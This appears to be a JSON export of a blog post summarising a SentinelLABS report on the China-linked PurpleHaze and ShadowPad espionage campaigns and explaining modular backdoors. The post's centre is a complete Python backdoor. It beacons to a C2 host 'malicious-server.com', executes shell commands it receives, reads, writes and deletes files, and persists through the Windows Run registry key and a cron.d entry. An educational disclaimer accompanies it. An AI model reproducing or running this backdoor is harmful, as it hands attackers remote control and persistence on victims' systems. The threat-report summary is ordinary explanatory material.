{"id":318,"date":"2025-06-09T22:36:41","date_gmt":"2025-06-10T01:36:41","guid":{"rendered":"https:\/\/devteriaio.com\/?p=318"},"modified":"2025-06-09T22:36:41","modified_gmt":"2025-06-10T01:36:41","slug":"ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores","status":"publish","type":"post","link":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/","title":{"rendered":"China-nexus cybersecurity threats: PurpleHaze and ShadowPad target suppliers"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1024x1024.png\" alt=\"\" class=\"wp-image-321\" srcset=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1024x1024.png 1024w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-300x300.png 300w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-150x150.png 150w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-768x768.png 768w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne-1536x1536.png 1536w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/SentinelOne.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>In a report released today, SentinelLABS, the research division of SentinelOne, revealed a series of cyber operations sponsored by groups with <strong>links to China<\/strong> (dubbed <em>PurpleHaze<\/em> and <em>ShadowPad<\/em>). 
These campaigns involved persistent espionage from July 2024 to March 2025, targeting government organizations, media companies, IT suppliers and, notably, <strong>cybersecurity vendors<\/strong>, including SentinelOne itself<a href=\"https:\/\/www.sentinelone.com\/labs\/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets\/?utm_source=chatgpt.com\" target=\"_blank\" rel=\"noreferrer noopener\">.<\/a><\/p>\n\n\n\n<p>Despite the intrusion attempts, SentinelOne confirmed that <strong>its defenses were not compromised<\/strong>. The operations included remote scanning and reconnaissance of exposed servers, as well as the intrusion into a third-party company responsible for the company's hardware logistics. The broad scope of the campaign (more than 70 organizations affected) shows the growing sophistication of the attacks, including against companies whose purpose is to protect others.<\/p>\n\n\n\n<p>The report highlights the urgency of strengthened practices for continuous monitoring, rapid response and transparency across the sector, to build resilience against state-sponsored threats. The disclosure of the activity is also meant to encourage international collaboration and the adoption of stricter security standards.<\/p>\n\n\n\n<p>The <strong>PurpleHaze<\/strong> and <strong>ShadowPad<\/strong> groups, identified in the SentinelLABS report, used a combination of <strong>advanced cyberattack techniques<\/strong>, with an emphasis on stealth, persistence and indirect compromise.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Techniques used by PurpleHaze and ShadowPad<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. 
<strong>Remote reconnaissance and scanning of exposed assets<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The attackers carried out <strong>scanning of public-facing servers<\/strong> and misconfigured remote interfaces.<\/li>\n\n\n\n<li>They used automated tools to detect open ports, vulnerable services and default security configurations.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>Supply chain compromise (Supply Chain Attack)<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Instead of attacking SentinelOne directly, the groups compromised a <strong>third-party logistics company<\/strong> that handles hardware for the company.<\/li>\n\n\n\n<li>This technique aims to gain indirect access by exploiting suppliers with less rigorous security.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">3. <strong>Use of the ShadowPad malware<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>ShadowPad<\/strong> is a highly stealthy <strong>modular backdoor platform<\/strong> associated with several China-linked espionage groups.<\/li>\n\n\n\n<li>It allows:<\/li>\n<\/ul>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Remote control.<\/li>\n\n\n\n<li>Data exfiltration.<\/li>\n\n\n\n<li>Execution of arbitrary commands.<\/li>\n\n\n\n<li>Dynamic updating of functionality.<\/li>\n<\/ol>\n\n\n\n<h3 class=\"wp-block-heading\">4. <strong>Persistent access<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>They deployed <strong>durable backdoors<\/strong> that allowed continuous, silent access to compromised environments for <strong>months<\/strong>, from July 2024 to March 2025.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">5. 
<strong>Obfuscation and evasion<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Encryption and packing<\/strong> techniques applied to the malware to avoid antivirus detection.<\/li>\n\n\n\n<li>Use of <strong>command and control (C2) servers<\/strong> disguised behind legitimate or compromised domains.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">6. <strong>Targeting of high-value organizations<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Strategic choice of targets with political, economic and technological impact: media companies, governments and cybersecurity suppliers.<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Automated Tools Used by the Groups<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1. <strong>GoReShell<\/strong> (<em>Custom backdoor<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Written in <strong>Go<\/strong>, it allows <strong>reverse SSH connections<\/strong> to servers under the attacker's control.<\/li>\n\n\n\n<li>Based on <strong>open-source<\/strong> code (reverse_ssh), which makes it easier to create secure, undetectable tunnels.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">2. <strong>Reverse SSH<\/strong> (<em>Remote tunneling technique<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open-source library used in GoReShell to establish secure reverse connections between the infected machine and the attacker.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">3. <strong>Operational Relay Box (ORB) Network<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Anonymous infrastructure that introduces intermediate layers between the malware and the command and control (C2) server, making tracing harder.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">4. 
<strong>ScatterBrain<\/strong> (<em>Custom compiler\/obfuscator<\/em>)<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tool that obfuscates the malware's code, hiding signatures and preventing detection by traditional solutions.<\/li>\n\n\n\n<li>Used in particular to disguise the loading of the <strong>ShadowPad<\/strong> backdoor.<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Modular Backdoor<\/h2>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1536\" src=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular.png\" alt=\"\" class=\"wp-image-320\" style=\"width:264px;height:auto\" srcset=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular.png 1024w, https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/backdoor_modular-200x300.png 200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n\n<p>A <strong>modular backdoor<\/strong> is a type of <strong>malicious software (malware)<\/strong> that allows unauthorized remote access to a system <strong>in a highly flexible way<\/strong>, using <strong>modules that can be loaded or updated on demand<\/strong>.<\/p>\n\n\n\n<p>The term <strong>modular<\/strong> indicates that the backdoor is built as a <strong>platform with interchangeable parts<\/strong>. 
Instead of containing all the malicious functions at once, it loads <strong>only the modules needed for each phase of the attack<\/strong>, such as:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\ud83d\udce1 <strong>Connection to the command and control (C2) server<\/strong><\/li>\n\n\n\n<li>\ud83e\udde0 <strong>Collection of system information<\/strong><\/li>\n\n\n\n<li>\ud83d\uddc2\ufe0f <strong>Data exfiltration<\/strong><\/li>\n\n\n\n<li>\ud83d\udce5 <strong>Download and execution of other malware<\/strong><\/li>\n\n\n\n<li>\ud83e\uddec <strong>Persistence (returning after a reboot)<\/strong><\/li>\n\n\n\n<li>\ud83d\udd75\ufe0f <strong>Keylogger or screen capture<\/strong><\/li>\n<\/ul>\n\n\n\n<p>These modules can be:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Installed dynamically (sent by the attacker when desired);<\/li>\n\n\n\n<li>Updated without reinstalling the main malware;<\/li>\n\n\n\n<li>Used selectively depending on the infected environment.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Example code for a modular backdoor using the Python programming language<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code># communication_module.py\nimport socket\nimport json\nimport base64\n\nclass CommunicationHandler:\n    def __init__(self, host, port):\n        self.host = host\n        self.port = port\n        self.connection = None\n        \n    def connect(self):\n        \"\"\"Establish connection to C2 server\"\"\"\n        try:\n            self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n            self.connection.connect((self.host, self.port))\n            return True\n        except Exception as e:\n            return False\n            \n    def send_data(self, data):\n        \"\"\"Send encrypted data to C2\"\"\"\n        if not self.connection:\n            return False\n        encrypted = 
self._encrypt(data)\n        self.connection.send(encrypted)\n        return True\n        \n    def receive_command(self):\n        \"\"\"Receive commands from C2\"\"\"\n        if not self.connection:\n            return None\n        data = self.connection.recv(1024)\n        return self._decrypt(data)\n        \n    def _encrypt(self, data):\n        \"\"\"Simple obfuscation\"\"\"\n        return base64.b64encode(json.dumps(data).encode())\n        \n    def _decrypt(self, data):\n        \"\"\"Simple deobfuscation\"\"\"\n        return json.loads(base64.b64decode(data).decode())\n\n\n# command_module.py\nimport subprocess\nimport os\n\nclass CommandExecutor:\n    @staticmethod\n    def execute_system_command(cmd):\n        \"\"\"Execute system commands\"\"\"\n        try:\n            result = subprocess.check_output(cmd, shell=True, stderr=subprocess.PIPE)\n            return result.decode()\n        except subprocess.CalledProcessError as e:\n            return str(e)\n\n    @staticmethod\n    def file_operation(operation, path, content=None):\n        \"\"\"Handle file operations\"\"\"\n        if operation == \"read\":\n            with open(path, 'r') as f:\n                return f.read()\n        elif operation == \"write\":\n            with open(path, 'w') as f:\n                f.write(content)\n            return \"File written\"\n        elif operation == \"delete\":\n            os.remove(path)\n            return \"File deleted\"\n        return \"Unknown operation\"\n\n\n# persistence_module.py\nimport sys\nimport platform\n\nclass PersistenceManager:\n    @staticmethod\n    def install():\n        \"\"\"Install persistence mechanism based on OS\"\"\"\n        system = platform.system()\n        if system == \"Windows\":\n            return PersistenceManager._windows_persistence()\n        elif system == \"Linux\":\n            return PersistenceManager._linux_persistence()\n        return \"Unsupported OS\"\n        \n    @staticmethod\n    
def _windows_persistence():\n        \"\"\"Windows persistence via registry\"\"\"\n        try:\n            import winreg\n            key = winreg.OpenKey(\n                winreg.HKEY_CURRENT_USER,\n                \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\",\n                0, winreg.KEY_SET_VALUE)\n            winreg.SetValueEx(key, \"LegitApp\", 0, winreg.REG_SZ, sys.executable)\n            winreg.CloseKey(key)\n            return \"Windows persistence installed\"\n        except Exception as e:\n            return str(e)\n            \n    @staticmethod\n    def _linux_persistence():\n        \"\"\"Linux persistence via cron job\"\"\"\n        try:\n            cron_line = f\"@reboot {sys.executable}\\n\"\n            with open(\"\/etc\/cron.d\/legitjob\", \"w\") as f:\n                f.write(cron_line)\n            return \"Linux persistence installed\"\n        except Exception as e:\n            return str(e)\n\n\n# main_backdoor.py\nimport time\nfrom communication_module import CommunicationHandler\nfrom command_module import CommandExecutor\nfrom persistence_module import PersistenceManager\n\nclass ModularBackdoor:\n    def __init__(self, c2_host, c2_port):\n        self.comm = CommunicationHandler(c2_host, c2_port)\n        self.installed = False\n        \n    def run(self):\n        \"\"\"Main backdoor loop\"\"\"\n        while True:\n            if not self.comm.connect():\n                time.sleep(60)\n                continue\n                \n            if not self.installed:\n                result = PersistenceManager.install()\n                self.comm.send_data({\"type\": \"persistence\", \"result\": result})\n                self.installed = True\n                \n            cmd = self.comm.receive_command()\n            if cmd:\n                response = self._handle_command(cmd)\n                self.comm.send_data(response)\n            time.sleep(10)\n            \n    def _handle_command(self, cmd):\n        
\"\"\"Process received commands\"\"\"\n        if cmd.get(\"type\") == \"system\":\n            result = CommandExecutor.execute_system_command(cmd&#91;\"command\"])\n            return {\"type\": \"system\", \"result\": result}\n        elif cmd.get(\"type\") == \"file\":\n            result = CommandExecutor.file_operation(\n                cmd&#91;\"operation\"],\n                cmd&#91;\"path\"],\n                cmd.get(\"content\"))\n            return {\"type\": \"file\", \"result\": result}\n        return {\"type\": \"error\", \"result\": \"Unknown command\"}\n\n\n# Example usage\nif __name__ == \"__main__\":\n    backdoor = ModularBackdoor(\"malicious-server.com\", 443)\n    backdoor.run()<\/code><\/pre>\n\n\n\n<p>This example shows how malicious functionality can be broken down into reusable and maintainable components while keeping its harmful purpose. In real systems, this modularity makes detection harder, because components can be updated or replaced independently.<\/p>\n\n\n\n<p>Remember: this example is for educational purposes only, to understand attack patterns and improve defenses. Never implement or use this kind of code on real systems.<\/p>\n\n\n\n<p>The attacks demonstrate not only the groups' technical sophistication but also the <strong>paradigm shift<\/strong> in cyber espionage: <strong>those who protect also become targets<\/strong>. 
The use of ShadowPad and the exploitation of third-party suppliers highlight the need for <strong>strengthened security at every level of the chain<\/strong>.<\/p>\n\n\n\n<p>Sources: <a href=\"https:\/\/www.sentinelone.com\/labs\/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets\/\">SentinelOne<\/a> \/ <a href=\"https:\/\/www.hardreset.info\/pt\/articles\/inside-shadows-sentinelone-exposes-chinese-cyber-espionage-network-targeting-its-systems-and-clients\/\">HardReset<\/a><\/p>\n\n\n<div class=\"wp-block-post-author\"><div class=\"wp-block-post-author__avatar\"><img alt='' src='https:\/\/secure.gravatar.com\/avatar\/755f4199df39aa9a5bd103e89303b9e3ed38735133907d262d65096beb27741b?s=48&#038;d=mm&#038;r=g' srcset='https:\/\/secure.gravatar.com\/avatar\/755f4199df39aa9a5bd103e89303b9e3ed38735133907d262d65096beb27741b?s=96&#038;d=mm&#038;r=g 2x' class='avatar avatar-48 photo' height='48' width='48' \/><\/div><div class=\"wp-block-post-author__content\"><p class=\"wp-block-post-author__name\">Raphael Giusti<\/p><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>In a report released today, SentinelLABS, the research division of SentinelOne, revealed a series of cyber operations sponsored by groups with links&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\">Continue reading<span class=\"screen-reader-text\">Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram 
fornecedores<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":319,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[1,15],"tags":[],"class_list":["post-318","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-ciberseguranca","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.9 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io<\/title>\n<meta name=\"description\" content=\"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io\" \/>\n<meta property=\"og:url\" content=\"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad\" \/>\n<meta property=\"og:site_name\" content=\"Devteria.io\" \/>\n<meta property=\"article:published_time\" content=\"2025-06-10T01:36:41+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"507\" 
\/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Raphael Giusti\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Raphael Giusti\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#article\",\"isPartOf\":{\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\"},\"author\":{\"name\":\"Raphael Giusti\",\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"headline\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram 
fornecedores\",\"datePublished\":\"2025-06-10T01:36:41+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\"},\"wordCount\":888,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"image\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"thumbnailUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"articleSection\":[\"Blog\",\"Ciberseguran\u00e7a\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/\",\"url\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad\",\"name\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io\",\"isPartOf\":{\"@id\":\"https:\/\/devteriaio.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"image\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\"},\"thumbnailUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"datePublished\":\"2025-06-10T01:36:41+00:00\",\"description\":\"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. 
Confira detalhes, impacto e recomenda\u00e7\u00f5es.\",\"breadcrumb\":{\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage\",\"url\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"contentUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png\",\"width\":1024,\"height\":507},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/devteriaio.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/devteriaio.com\/#website\",\"url\":\"https:\/\/devteriaio.com\/\",\"name\":\"DEVTERIA.io\",\"description\":\"Seu blog de tecnologia\",\"publisher\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/devteriaio.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66\",\"name\":\"Raphael 
Giusti\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png\",\"contentUrl\":\"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png\",\"width\":500,\"height\":281,\"caption\":\"Raphael Giusti\"},\"logo\":{\"@id\":\"https:\/\/devteriaio.com\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/devteriaio.com\"],\"url\":\"https:\/\/devteriaio.com\/index.php\/author\/devteria-io\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io","description":"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad","og_locale":"pt_BR","og_type":"article","og_title":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - Devteria.io","og_url":"https:\/\/devteriaio.com\/amea\u00e7as-china-ciberseguran\u00e7a-purplehaze-shadowpad","og_site_name":"Devteria.io","article_published_time":"2025-06-10T01:36:41+00:00","og_image":[{"width":1024,"height":507,"url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","type":"image\/png"}],"author":"Raphael Giusti","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Raphael Giusti","Est. 
tempo de leitura":"5 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#article","isPartOf":{"@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/"},"author":{"name":"Raphael Giusti","@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"headline":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores","datePublished":"2025-06-10T01:36:41+00:00","mainEntityOfPage":{"@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/"},"wordCount":888,"commentCount":0,"publisher":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"image":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"thumbnailUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","articleSection":["Blog","Ciberseguran\u00e7a"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#respond"]}]},{"@type":"WebPage","@id":"https:\/\/devteriaio.com\/index.php\/2025\/06\/09\/ameacas-china-nexus-em-ciberseguranca-purplehaze-e-shadowpad-miram-fornecedores\/","url":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad","name":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores - 
Devteria.io","isPartOf":{"@id":"https:\/\/devteriaio.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"image":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage"},"thumbnailUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","datePublished":"2025-06-10T01:36:41+00:00","description":"SentinelLABS revela campanha cont\u00ednua de ciberespionagem ligada \u00e0 China contra fornecedores de ciberseguran\u00e7a e outras 70+ organiza\u00e7\u00f5es. Confira detalhes, impacto e recomenda\u00e7\u00f5es.","breadcrumb":{"@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#primaryimage","url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","contentUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2025\/06\/cibersecurity1.png","width":1024,"height":507},{"@type":"BreadcrumbList","@id":"https:\/\/devteriaio.com\/amea%c3%a7as-china-ciberseguran%c3%a7a-purplehaze-shadowpad#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/devteriaio.com\/"},{"@type":"ListItem","position":2,"name":"Amea\u00e7as China-nexus em ciberseguran\u00e7a: PurpleHaze e ShadowPad miram fornecedores"}]},{"@type":"WebSite","@id":"https:\/\/devteriaio.com\/#website","url":"https:\/\/devteriaio.com\/","name":"DEVTERIA.io","description":"Seu blog de 
tecnologia","publisher":{"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/devteriaio.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":["Person","Organization"],"@id":"https:\/\/devteriaio.com\/#\/schema\/person\/2d7d984adb6457833fd39737aa53ac66","name":"Raphael Giusti","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/devteriaio.com\/#\/schema\/person\/image\/","url":"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png","contentUrl":"https:\/\/devteriaio.com\/wp-content\/uploads\/2024\/09\/1000000046-edited.png","width":500,"height":281,"caption":"Raphael 